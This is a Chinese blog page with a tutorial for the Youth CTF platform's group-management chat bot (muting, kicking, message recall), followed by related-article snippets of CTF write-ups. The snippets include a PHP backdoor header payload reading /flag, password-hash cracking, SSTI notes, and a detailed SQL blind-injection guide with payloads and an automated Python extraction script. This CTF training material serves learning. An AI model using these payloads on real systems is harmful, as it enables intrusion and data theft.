【教程】青少年CTF机器人使用教程

最新推荐文章于 2025-09-11 09:10:50 发布

原创

最新推荐文章于 2025-09-11 09:10:50 发布 · 812 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

前言

本期教程适用于版本号为2.0.1-Beta的青少年CTF机器人，其他版本可能与当前版本不同。

由于之前版本的机器人重构，所以我们细化了本次的机器人逻辑，并且对机器人的功能进行了一些升级。

机器人语言：Python

支持客户端：QQ、飞书

群管功能

群管理功能是面向群主、管理员的一个非常方便的管理功能，主要用途是维护社区秩序等。

撤回消息

只需要回复需要撤回的消息，输入“撤回”即可让机器人帮助你撤回。

精华消息

操作方法同上，只需要回复“设置精华”或”移除精华“即可。

禁言与踢人

全员禁言

触发词有：开启全员禁言、全员禁言、关闭全员禁言、关闭全员。

禁言某人

只需要发送：

禁言 @xxxx 10

即可禁言其十分钟

解禁则需要

解禁 @xxxx

踢出某人

只需要发送：

踢出 @xxxx

即可将其踢出

群签到

除了定时任务中的群签到，还可以指定群签到。

开关机

定义机器人是否在指定群聊中开启（需要先对机器人授权）

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

青少年CTF训练平台

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[青少年 CTF] Robots

piggcs的博客

04-03

421

删除网址的/robots.txt 输入 /f1ag_1n_the_h3re.php 得到Flag。

青少年CTF练习平台 EzLogin exp

2301_80395418的博客

05-31

1091

【代码】青少年CTF练习平台 EzLogin exp。

参与评论您还未登录，请先登录后发表或查看评论

1 条评论

m0_70078967 2024.11.11
所以怎么加群

青少年CTF-Web-Robots

zxsctf的博客

10-08

1176

题目名称：Robots题目描述：昨天十三年社团讲课，讲了Robots.txt的作用，小刚上课没有认真听课正在着急，你能不能帮帮忙？题目难度：一颗星。

AI破解CTF：漏洞挖掘与利用的智能革命

09-11

768

在CTF（Capture The Flag）竞赛的战场上，漏洞挖掘与利用始终是最具挑战性的核心环节。随着网络安全对抗的日益激烈，CTF题目也变得越来越复杂，传统的人工分析方法已经难以满足快速解题的需求。近年来，人工智能技术的突破为CTF竞赛带来了一场革命，AI辅助的漏洞挖掘与利用工具正在成为参赛队伍的秘密武器。据统计，在2024年的全球顶级CTF赛事中，超过60%的获奖队伍使用了AI辅助工具，这些工具在漏洞识别、利用链构造和绕过安全机制等方面展现出了惊人的能力。

青少年 CTF 练习平台：Misc（一）

Flag少侠的博客

05-24

8913

Bear（熊日解码）、表情包、神奇的压缩包、Whale、小光的答案之书、是我的 Hanser!、上号、多情、我们的秘密、仓鼠的窝

青少年CTF-EasyMD5

CTF

03-08

870

打开容器后发现类似于文件上传，先尝试，发现会提示不是 pdf格式的文件，还提示文件过大，最后提示你知道MD5碰撞吗？利用生成器生成两个MD5值相等的pdf文件上传即可。

青少年CTF Crypto-Easy Morse WP

weixin_55265137的博客

10-11

550

青少年CTF Crypto-Easy Morse WP

青少年CTF 简简单单的题目

03-07

青少年CTF 简简单单的题目

【CTF】青少年CTF擂台挑战赛 2024 #Round 1 部分WriteUp_青少年ctf训练平台追光者(2)

m0_60691292的博客

05-13

834

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！第九步，根据刚开始的文件名提示，这个应该也是反转了的。第六步，还有一个看不清的光.zip 加密压缩包。压缩包内有flag.txt的倒写txt.galf。将压缩包外的闪.jpg也压缩为闪.zip。第四步，卡了很久，但是AB和AD应该是关键。认真找出现的奇怪的地方，发现了一大片……

青少年CTF训练平台-WEB-部分wp

SwBack的博客

04-04

3419

扫描发现备份文件打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码用户名后有$y，则表明密码已使用 yescrypt 进行哈希处理指定format参数新手的登录使用提示的user账号登录之后抓包修改cookie为admin。发包，得到flag访问之后直接查看js

青少年CTF-SSTI

weixin_49803180的博客

04-04

1398

在获取初始化属性后，带wrapper的说明没有重载，寻找不带warpper的，因为wrapper是指这些函数并没有被重载，这时它们并不是function，不具有__globals__属性。python的object类中集成了很多的基础函数，我们想要调用的时候也是需要用object去操作的，主要是通过__mro__ 和 __bases__两种方式来创建。|attr()为jinja2原生函数，是一个过滤器，它只查找属性获取并返回对象的属性的值，过滤器与变量用管道符号（ | ）分割.%}1{% endif %}

ctf-discord-bot:一种在Discord上管理角色等的机器人

04-30

CTF不和谐机器人 需要节点v14。执照：麻省理工学院特征显示为玩家嵌入的排名统计信息。 !rank rank-具有Discord用户的用户名或昵称的玩家的统计信息。 !rank username -玩家username !rank username统计信息。 !oldrank具有Discord用户名或昵称的玩家的旧统计信息。 !oldrank username -玩家username旧统计信息。将排行榜发布到频道，编辑现有消息。用法使用创建Discord bot和应用程序，如所示。如所示，将Discord bot邀请到所需的服务器。安装依赖项： npm install 。使用环境变量运行： RANKINGS_CHANNEL=id STATS=path/to/ctf_stats OLD_STATS=path/to/ctf_stats.old TOKEN=

ctfbot:电报的CTF机器人

05-16

#CTF电报机器人 麻省理工学院许可将文件config.js.dist复制到config.js ，并在开始之前进行适当的更改 JoséIgnacio Rojo < >

青少年CTF-Misc-1

weixin_53226786的博客

07-02

1290

然后把能尝试的操作都操作了一编，然后思考很久想起来了，jpg图片文件可以通过steghide工具，然后这下面又多了一串，尝试用steghide进行解密得到flag。用010editor发现文件尾越看越奇怪，然后看上面grep过滤出来的数据，难不成是原本是flag.zip被倒叙了变成了piz.flag,010查看，发现有伪加密，而且还多了个文件头，直接把上面文件头删除，就可解压。tysec{mealibertasmeuscanor}得到一堆2d2d的数据,根据提示，猜测是摩斯和培根密码，尝试解密。

青少年ctf-random（梅森算法-MT19973）

yuqie的博客

06-14

1426

这道题的漏洞在于这个函数： MT19973算法能生成1-623个32位随机数，而我们有 (32/32+64/32+96/32)*104=624个已知随机数，那么我们就完全可以求出下一个随机数。这里生成的一组数据里分别是32位、64位、96位，这里我们只需要32位，所以需要把64位和96位的数分成两个或者三个32位数，可以用它们与32位全为1的二进制数来分离。这里可以直接引用RandCrack库，将已经生成的624个数按顺序传入RandCrack函数里，利用predict_getrandbits来计算出下

青少年CTF训练（Misc）wp

qq_42421872的博客

11-23

2845

只是做了部分的misc的题目，有可能不是很全，等后面做完我在写wp。

青少年CTF平台-Web-PingME

zxsctf的博客

10-09

1700

题目难度一颗星，五十分。

青少年ctf CheckMe01~08

qq_44640313的博客

01-09

1450

qsnctf CheckMe01~08的wp

[青少年CTF]-MISC WP(一)

qq_45524026的博客

03-14

2548

[青少年CTF]-MISC WP(一)

青少年CTF easy_sqli 使用手工盲注

06-22

### 手工SQL盲注技巧在CTF中的应用在CTF比赛中，`easy_sqli` 类型的题目通常涉及通过手工SQL注入或盲注来获取数据库中的敏感信息。以下是关于如何使用手工SQL盲注技巧解决此类问题的详细说明。 #### 1. 确定注入点首先需要确认是否存在SQL注入漏洞。可以通过以下方式测试： - 尝试输入特殊字符（如 `'` 或 `"`）并观察页面是否返回错误信息。 - 如果页面返回错误，则可能表明存在SQL注入漏洞[^1]。 #### 2. 判断字段数量使用 `order by` 语句判断查询结果的字段数量。例如： ```sql http://example.com/?id=1 order by 3-- ``` 如果页面正常显示，则说明查询结果至少有3个字段；若报错，则减少数字继续测试，直到找到最大不报错的数字[^3]。 #### 3. 使用布尔盲注确定数据库名布尔盲注通过条件判断来逐步猜测数据库名称。例如： ```sql ?id=1 and substr(database(),1,1)='s'-- ``` 上述语句用于判断数据库名的第一个字符是否为 `s`。如果页面正常显示，则说明条件成立；否则条件不成立[^2]。 #### 4. 爆破表名和列名一旦确定数据库名，可以使用类似方法爆破表名和列名。例如： ```sql ?id=1 and substr((select table_name from information_schema.tables where table_schema='ctftraining' limit 1),1,1)='f'-- ``` 此语句用于判断数据库 `ctftraining` 中的第一个表名的第一个字符是否为 `f`[^1]。 #### 5. 获取数据在确定目标表和列后，可以进一步爆破具体数据。例如： ```sql ?id=1 and ascii(substr((select flag from supersqli.1919810931114514 limit 1),1,1))=115-- ``` 上述语句用于判断 `flag` 字段的第一个字符的ASCII值是否为 `115`（即字符 `s`）。通过不断调整位置和字符值，逐步拼接出完整的数据。 #### 6. 时间盲注（可选）如果布尔盲注不可行，可以尝试时间盲注。例如： ```sql ?id=1 and if(ascii(substr((select flag from supersqli.1919810931114514 limit 1),1,1))=115,sleep(5),0)-- ``` 此语句会在条件成立时使服务器延迟5秒，从而判断条件是否正确[^4]。 #### 示例代码以下是一个简单的Python脚本，用于自动化布尔盲注过程： ```python import requests url = "http://example.com/login.php" flag = "" for pos in range(1, 50): # 假设flag长度不超过50 for char_code in range(32, 127): # ASCII可打印字符范围 payload = f"' or (ascii(substr((select flag from supersqli.1919810931114514),{pos},1))={char_code})--" data = {'uname': payload, 'psw': '1'} res = requests.post(url, data=data) if "Login successful" in res.text: # 根据成功标志判断 flag += chr(char_code) print(f"[+] Current flag: {flag}") break print(f"[+] Final flag: {flag}") ``` ### 注意事项 - 在手工盲注过程中，需要耐心地逐位爆破字符。 - 需要熟悉SQL语法以及常见的数据库元数据表（如 `information_schema`）[^5]。